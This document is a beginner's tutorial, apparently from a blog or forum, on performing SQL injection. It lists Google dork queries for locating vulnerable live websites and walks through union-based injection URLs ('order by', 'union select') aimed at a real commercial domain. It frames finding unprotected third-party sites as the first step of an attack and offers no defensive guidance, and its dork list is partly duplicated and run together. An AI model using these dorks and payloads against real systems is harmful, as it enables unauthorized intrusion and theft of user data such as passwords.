SQL INJECTION FOR BEGINNERS

sql injection:

                                 SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input.

Injected SQL commands can alter SQL statement and compromise the security of a web application.

How to exploit the SQL Injection Attack

 It needs a little understanding of SQL and a great deal of cunning.

Try your Hacking skills against this test system. It takes you through the exploit step-by-step.

The SQL Injection attack allows external users to read details from the database. In a well designed system this will only include data that is available to the public anyway. In a poorly designed system this may allow external users to discover other users' passwords.

prepare:

               The first step to performing a SQL injection attack is to find a vulnerable website. This will probably be the most time-consuming process in the entire attack. More and more websites are protecting themselves from SQL injection meaning that finding a vulnerable target could take quite some time.

One of the easiest ways to find vulnerable sites is known as Google Dorking. In this context, a dork is a specific search query that finds websites meeting the parameters of the advanced query you input. Some examples of dorks you can use to find sites vulnerable to a SQL injection attack include:

1. inurl:index.php?id=
2. inurl:trainers.php?id=
3. inurl:buy.php?category=
4. inurl:article.php?ID=
5. inurl:play_old.php?id=
6. inurl:declaration_more.php?decl_id=
7. inurl:pageid=
8. inurl:games.php?id=
9. inurl:page.php?file=
10. inurl:newsDetail.php?id=
11. inurl:gallery.php?id=
12. inurl:article.php?id=
13. inurl:show.php?id=
14. inurl:staff_id=
15. inurl:newsitem.php?num= andinurl:index.php?id=
16. inurl:trainers.php?id=
17. inurl:buy.php?category=
18. inurl:article.php?ID=
19. inurl:play_old.php?id=
20. inurl:declaration_more.php?decl_id=
21. inurl:pageid=
22. inurl:games.php?id=
23. inurl:page.php?file=
24. inurl:newsDetail.php?id=
25. inurl:gallery.php?id=
26. inurl:article.php?id=
27. inurl:show.php?id=
28. inurl:staff_id=
29. inurl:newsitem.php?num=

Of course, there are many others as well. The key component of these specialized search queries is that they all focus on websites that rely on PHP scripts to generate dynamic content from a SQL database somewhere on the backend of the server. 

ex:http://www.udemy.com/index.php?catid=1’

Attack

After locating a vulnerable site, you need to figure out how many columns are in the SQL database and how many of those columns are able to accept queries from you. Append an “order by” statement to the URL like this:

http://www.udemy.com/index.php?catid=1 order by 1

Continue to increase the number after “order by” until you get an error. The number of columns in the SQL database is the highest number before you receive an error. You also need to find out what columns are accepting queries.

You can do this by appending an “Union Select” statement to the URL. A union select statement in this URL would look like this:

http://www.udemy.com/index.php?catid=-1 union select 1,2,3,4,5,6

There are a couple of things to note in this example. Before the number one (after catid), you need to add a hyphen (-). Also, the number of columns you discovered in the previous step is the number of digits you put after the union select statement. For instance, if you discovered that the database had 12 columns, you would append:

catid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12

The results of this query will be the column numbers that are actually accepting queries from you. You can choose any one of these columns to inject your SQL statements.